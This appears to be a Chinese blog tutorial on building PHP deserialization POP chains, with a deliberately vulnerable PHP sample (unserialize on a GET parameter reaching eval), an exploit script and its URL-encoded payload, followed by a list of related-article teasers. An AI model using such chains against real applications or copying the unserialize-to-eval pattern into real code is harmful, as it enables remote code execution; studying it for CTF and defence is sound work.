pop链 php,php反序列化pop链的构造

最新推荐文章于 2024-04-24 17:20:18 发布
最新推荐文章于 2024-04-24 17:20:18 发布
阅读量369 收藏 1
点赞数
文章标签: pop链 php

通常反序列化的攻击是在魔术方法中出现一些可利用的漏洞,通过自动调用来触发漏洞。

但是如果关键代码不在魔术方法中,而是在一个类的普通方法中。这个时候我们可以通过寻找相同的函数名将类的属性和敏感函数联系起来

借用网上的代码:<?php

class lemon {

protected $ClassObj;

function __construct() {

$this->ClassObj = new normal();

}

function __destruct() {

$this->ClassObj->action();

}

}

class normal {

function action() {

echo "hello";

}

}

class evil {

private $data;

function action() {

eval($this->data);

}

}

unserialize($_GET['d']);

其中类normal 和 evil同时拥有action方法,并且evil中的方法是可控的,我们可以通过反序列化来掉用evil类中的action方法

exp:<?php

class lemon {

protected $ClassObj;

function __construct() {

$this->ClassObj = new evil();

}

function __destruct() {

$this->ClassObj->action();

}

}

class normal {

function action() {

echo "hello";

}

}

class evil {

private $data = "phpinfo();";

function action() {

eval($this->data);

}

}

$a = new lemon();

echo urlencode(serialize($a));

会生成这样一段payloadO%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

用get方式传入

5dddea04a704d.jpg

可以看到成功进行了利用

蓝色麻雀
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
POP构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4319
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP中的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问...
php对象注入-pop构造
dengzhasong7076的博客
11-07 281
前言 反序列化可以控制类属性,无论是private还是public <?php class A { private $a = "a"; public $b = "b"; static $c = "c"; } $test = new A(); echo urlencode(serialize($test)); O%3A1%3A%22A%22%3A2%3A%7...
PHP反序列化pop构造
Elite的博客
03-28 848
简单易懂的反序列化pop构造
php中的pop构造
blackguest07的博客
03-02 1382
php反序列化漏洞的原理,pop构造
php反序列化学习(中)--pop构造
最新发布
qq_75120258的博客
04-24 865
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
Laravel8反序列化POP分析挖掘 .pdf
09-05
本文将深入探讨Laravel 8反序列化POP(Payload On Purpose)的分析与挖掘。 首先,我们需要了解什么是反序列化反序列化是将之前通过序列化保存的数据结构恢复为原来的对象或数据的过程。在这个过程中,如果设计...
ThinkPHP 6.x反序列化POP(一)1
08-03
《深入理解ThinkPHP 6.x反序列化POP利用》 在网络安全领域,ThinkPHP作为国内广泛应用的PHP框架,其安全问题备受关注。本文将详细探讨ThinkPHP 6.x版本中的一个特定安全问题——反序列化POP的利用,帮助开发者...
ThinkPHP 6.x反序列化POP(三)1
08-03
总结起来,ThinkPHP 6.x中的这个反序列化POP利用了`league/flysystem-cached-adapter`库中的`AbstractCache`和`Adapter`类,通过控制`pathPrefix`和`$contents`,能够在服务器上写入恶意代码,造成潜在的安全风险...
ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP1
08-03
ThinkPHP是一款广泛使用的PHP框架,其3.2.*版本存在反序列化漏洞,允许攻击者通过精心构造的数据包触发特定行为,如SQL注入和文件读取。本文将深入探讨该漏洞的原理、利用条件以及防范措施。 首先,我们要了解反...
50个优秀经典PHP算法大集合 附
12-17
6. **动态规划**:解决最优化问题,如背包问题、最长公共子序列等,PHP可以实现这类递推和记忆化技巧。 7. **贪心算法**:通过局部最优解求全局最优,如最小生成树的Prim算法和Kruskal算法,适用于资源分配和任务...
popphp:流行PHP框架核心组件
05-22
流行PHP 概述 popphpPop PHP Framework的主要核心组件集。 它提供了主要的Application对象,可以将其配置为管理和与基础核心组件交互: 路由器 控制器 模型 模块经理 事件管理器 服务定位器 popphp是的主要核心组件。 安装 使用Composer安装popphp 。 composer require popphp/popphp 讨论 在irc:// freenode / popphp上有一个Pop PHP的IRC频道。 基本用法 配置技巧 应用对象 这是一个将Web应用程序对象与定义一些基本路由的配置文件连接起来的简单示例: application.php <?php return [ 'routes' => [ '/' => [ 'controller' => 'MyApp\Control
反序列化学习——pop构造
m0_73756016的博客
03-10 581
反序列化中,我们能控制的数据就是对象中的属性值(成员变量所以在PHP反序列化中有一种漏洞利用方法叫"面向属性编程"POP( Property Oriented Programming).Poc是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。然后让benben = fast这个类将其反序列化的时候顺理成章调用wakeup。所以要触发wakeup() 必须要反序列化fast这个类。魔术方法触发前提:魔术方法所在类(或对象)被调用。这里如果benben的值为反序列化类sec的结果。
php反序列化pop构造
m0_62422842的博客
04-06 7486
前言 随着对反序列化学习的不断深入,我们来学习一下pop构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
pop构造和phar://协议
qq_48511129的博客
12-13 716
phar类似java中的jar包,是一种压缩包。可以对php项目进行打包成 .phar类型的文件,也可以把某个功能模块打包直接发布。 1.配置 要想使用phar文件,必须将phar.readonly配置项配置为0或Off <?php class B{ public function __destruct(){ echo $this -> name; } } $phar = new Phar("test.phar"); $phar -> startBuff
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 1970
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化POP 构造利用
cosmoslin的博客
09-14 2113
POP 构造利用 一、POP简介 1、POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg
PHP构造pop2
YV_LING的博客
11-15 678
CTFshow“菜狗杯”中的一道题目。
PHP反序列化构造POP
Lemon's blog
04-03 4554
前言: 最近在刷题的时候发现这个PHP反序列化POP,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
pop php,什么是POP
weixin_31817039的博客
03-12 272
POP,即邮局协议,是一种计算机网络和Internet标准协议;它是用于在电子邮件客户端上接收电子邮件的最常用协议之一。下面本篇文章就来具体介绍一下POP(邮局协议),希望对你们有所帮助。POP的基本知识POP(邮局协议)可以从远程邮件服务器提取和检索电子邮件以供主机访问;它是OSI模型中的应用层协议,可以为最终用户提供获取和接收电子邮件的能力。POP是电子邮件通信背后的主要协议,它可以通过支持电...
php反序列化pop
10-17
PHP反序列化POP是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程中触发恶意代码,从而实现攻击目的。POP是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值